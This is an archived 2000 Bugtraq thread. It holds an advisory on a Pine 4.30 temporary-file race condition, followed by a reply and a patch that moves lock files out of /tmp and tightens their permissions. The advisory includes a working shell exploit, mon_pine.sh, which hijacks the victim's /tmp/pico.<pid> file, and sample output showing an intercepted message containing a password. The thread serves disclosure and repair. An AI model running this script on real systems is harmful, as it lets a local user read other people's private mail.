5845490 2000-12-11 17:43 +0900 /103 rader/ JW Oh <mat@IVNTECH.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-11 20:41 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: mat@IVNTECH.COM
Mottagare: Bugtraq (import) <14150>
Ärende: [hacksware]Pine temporary file hijacking vulnerability
------------------------------------------------------------
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0012111741270.7292-100000@ivntech.com>
Hacksware Bug Report
1. Name: Pine temporary file hijacking vulnerability
2. Release Date: 2000.12.11
3. Affected Application:
Pine Version 4.30(or maybe other versions)
4. Author: mat@hacksware.com
5. Type: Local Race Condition
6. Explanation
If pine setting is like following:
[x] enable-alternate-editor-cmd
[x] enable-alternate-editor-implicitly
editor = /usr/bin/vi
pine creates it's temporary in in /tmp directory with names like /tmp/pico.007292(where 7292 is the pid of pine process running).
You can simply symlink this file(/tmp/pico.<pid>) to another file
that doesn't exist. When victim is editing message victim editor vi
follows symlinks and creates another file. By removing this symlink
and creating your own temporary file and making it writable to
victim, you can hijack his mail message.
7. Exploits
--------------------mon_pine.sh start--------------------------------
#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of pine process>
# victim pine must use following settings
#
# mat@hacksware.com
# http://hacksware.com
#
# [x] enable-alternate-editor-cmd
# [x] enable-alternate-editor-implicitly
# editor = /usr/bin/vi
#
PID=$1
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
echo PICO_FILE is $PICO_FILE
#if $PICO_FILE and $TRASHCAN exists, remove them
if test -f $PICO_FILE
then
rm -f $PICO_FILE
fi
if test -f $TRASHCAN
then
rm -f $TRASHCAN
fi
ln -s $TRASHCAN $PICO_FILE
while :
do
if test -f $TRASHCAN
then
break
fi
done
echo Victim is Editing Pine Message
rm -f $PICO_FILE
echo We replace temporary file
touch $PICO_FILE
chmod 777 $PICO_FILE
echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f $PICO_FILE
--------------------mon_pine.sh end --------------------------------
8. Example
[mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep
7292 pts/1 S 0:22 pine
[mat@overheaven /tmp]$ sh mon_pine.sh 7292
PICO_FILE is /tmp/pico.007292
... wait for victim to compose mail....
Victim is Editing Mail
We replace temporary file
Get the message from /tmp/pico.007292
^C to break tailer
Hello...
Your new password is "greenbee"
Don't let anyone know this...
Thanks..
--
=================================================
| mat@hacksware.com |
| http://hacksware.com |
=================================================
(5845490) --------------------------------(Ombruten)
5864806 2000-12-14 17:12 +0100 /14 rader/ Andrzej Chabierski <outsider@LANGUSTA.STARNET.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2000-12-15 22:28 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: outsider@LANGUSTA.STARNET.PL
Mottagare: Bugtraq (import) <14238>
Kommentar till text 5856699 av Peter W <peterw@USA.NET>
Ärende: Re: where user temp files should go, env var names
------------------------------------------------------------
hello
this patch shoot off this problem wher is the TMP file or somting
else... Autor this patch is Mikolaj Rydzewski Patch in attachment
/----------------------------------\ /----------------------------------\
| Andrzej Chabierski |__| ~OutSideR~ outsider@ariadna.pl |
| Technical University of Szczecin __ kom: 606-191-311 ICQ:26136043 |
| Network Administrator | | Linux Registered User #182054 |
\----------------------------------/ \----------------------------------/
(5864806) --------------------------------(Ombruten)
Bilaga (text/plain) i text 5864807
5864807 2000-12-14 17:12 +0100 /22 rader/ Andrzej Chabierski <outsider@LANGUSTA.STARNET.PL>
Bilagans filnamn: "pine-4.30-patch"
Importerad: 2000-12-15 22:28 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: outsider@LANGUSTA.STARNET.PL
Mottagare: Bugtraq (import) <14239>
Bilaga (text/plain) till text 5864806
Ärende: Bilaga (pine-4.30-patch) till: Re: where user temp files should go, env var names
------------------------------------------------------------
diff -Nru pine4.30.orig/imap/src/osdep/unix/env_unix.c
pine4.30/imap/src/osdep/unix/env_unix.c
--- pine4.30.orig/imap/src/osdep/unix/env_unix.c Wed Oct 25
03:43:40 2000
+++ pine4.30/imap/src/osdep/unix/env_unix.c Tue Nov 7 13:18:05 2000
@@ -55,7 +55,7 @@
/* default directory protection */
static long dir_protection = 0700;
/* default lock file protection */
-static long lock_protection = 0666;
+static long lock_protection = 0600;
/* default ftp file protection */
static long ftp_protection = 0644;
/* default public file protection */
@@ -1033,7 +1033,7 @@
#ifdef CHROOT_SERVER
"",
#else
- "/tmp",
+ (*myhomedir()) ? myhomedir() : "/tmp",
#endif
(unsigned long) sbuf->st_dev,(unsigned long) sbuf->st_ino);
while (T) { /* until get a good lock */
(5864807) --------------------------------(Ombruten)